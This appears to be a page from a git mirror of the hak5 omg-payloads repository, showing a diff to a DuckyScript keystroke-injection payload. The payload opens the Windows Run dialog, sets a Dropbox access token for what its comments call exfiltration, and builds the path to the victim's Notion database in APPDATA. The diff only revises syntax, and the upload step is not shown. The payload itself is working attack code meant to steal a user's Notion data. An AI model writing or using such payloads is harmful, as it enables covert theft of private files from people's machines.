mirror of https://github.com/hak5/omg-payloads.git
Update payload.txt
parent
d12271c1c5
commit
4f7713cda7
|
@ -15,7 +15,7 @@ REM - Internet Connection
|
||||||
|
|
||||||
|
|
||||||
REM You must define your Dropbox accessToken or modify the exfiltration modality.
|
REM You must define your Dropbox accessToken or modify the exfiltration modality.
|
||||||
DEFINE DROPBOX_ACCESS_TOKEN example
|
DEFINE #DROPBOX_ACCESS_TOKEN example
|
||||||
|
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
|
@ -24,13 +24,10 @@ ENTER
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
|
|
||||||
REM Setting about exfiltration
|
REM Setting about exfiltration
|
||||||
STRING $accessToken = "
|
STRINGLN $accessToken = "#DROPBOX_ACCESS_TOKEN"
|
||||||
STRING DROPBOX_ACCESS_TOKEN
|
|
||||||
STRING "
|
|
||||||
ENTER
|
|
||||||
|
|
||||||
REM Settings about Notion DB
|
REM Settings about Notion DB
|
||||||
STRINGLN
|
STRINGLN_BLOCK
|
||||||
$NotionPath = Join-Path -Path $env:APPDATA -ChildPath 'Notion'
|
$NotionPath = Join-Path -Path $env:APPDATA -ChildPath 'Notion'
|
||||||
$NotionDatabasePath = Join-Path -Path $NotionPath -ChildPath "notion.db"
|
$NotionDatabasePath = Join-Path -Path $NotionPath -ChildPath "notion.db"
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue